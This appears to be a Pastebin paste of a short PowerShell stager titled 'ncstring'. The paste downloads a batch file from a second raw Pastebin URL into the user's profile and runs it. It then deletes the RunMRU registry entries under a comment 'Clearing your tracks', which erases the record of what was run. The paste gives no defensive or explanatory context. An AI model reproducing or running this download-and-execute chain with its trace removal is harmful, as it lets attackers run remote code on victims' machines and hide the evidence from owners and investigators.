Advertisement
moishyg07

ncstring

Feb 27th, 2019
517
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. cd $env:userprofile;mkdir x64;cd x64;
  2. wget https://pastebin.com/raw/aawZ1vee -OutFile run.bat
  3. start run.bat
  4.  
  5. // --> Clearing your tracks
  6.  
  7.  
  8. Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
  9.  
  10. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement